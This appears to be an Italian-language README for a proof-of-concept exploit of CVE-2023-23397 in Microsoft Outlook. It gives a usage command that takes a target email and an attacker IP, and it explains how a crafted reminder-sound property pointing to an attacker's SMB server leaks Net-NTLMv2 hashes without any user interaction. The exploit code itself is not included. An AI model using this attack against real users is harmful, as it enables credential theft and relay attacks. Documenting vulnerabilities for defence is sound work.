
CVE-2023-23397 PoC
Questa è una prova di concetto (PoC) per CVE-2023-23397, una vulnerabilità nel client Windows Microsoft Outlook.
pywin32pywin32 richiesto eseguendo pip install pywin32.python Exploit.py <save_or_send> <target_email> <attacker_ip>.pywin32 richiesto eseguendo pip install pywin32.python Exploit.py <save_or_send> <target_email> <attacker_ip>.<save_or_send>: Scegli tra "save" o "send". "save" salverà l'email dannosa come file, mentre "send" invierà l'email direttamente al target.<target_email>: L'indirizzo email dell'utente target.<attacker_ip>: L'indirizzo IP del server SMB dell'attaccante.Questa è una panoramica di alto livello di CVE-2023-23397, una vulnerabilità nel client Windows Microsoft Outlook.
CVE-2023-23397 è una vulnerabilità che permette a un attaccante di creare un'email dannosa che, quando elaborata dal client Outlook, perde automaticamente gli hash Net-NTLMv2 dell'utente target. Non è richiesta alcuna interazione dell'utente per attivare l'exploit. Gli hash trapelati possono essere utilizzati per attacchi di relay o per crackare le credenziali sottostanti.
La vulnerabilità esiste a causa del modo in cui Outlook gestisce la proprietà PidLidReminderFileParameter nei messaggi email. Questa proprietà consente al mittente di impostare un suono di notifica personalizzato per elementi come le notifiche di riunioni. Creando un messaggio con una proprietà PidLidReminderFileParameter personalizzata che contiene un percorso UNC (Universal Naming Convention) che punta a un server SMB controllato dall'attaccante, quest'ultimo può far sì che il client Outlook del target perda gli hash Net-NTLMv2 quando si connette al server SMB.
Lo script di exploit di prova di concetto (PoC) fornito genera un'email dannosa con la proprietà PidLidReminderFileParameter personalizzata e la salva come file o la invia direttamente all'indirizzo email target. L'attaccante deve configurare un server SMB per catturare gli hash Net-NTLMv2 trapelati.
Questa panoramica di alto livello è solo a scopo educativo. Comprendere la vulnerabilità e il suo impatto può aiutare a migliorare le pratiche di sicurezza e sviluppare difese efficaci contro attacchi simili.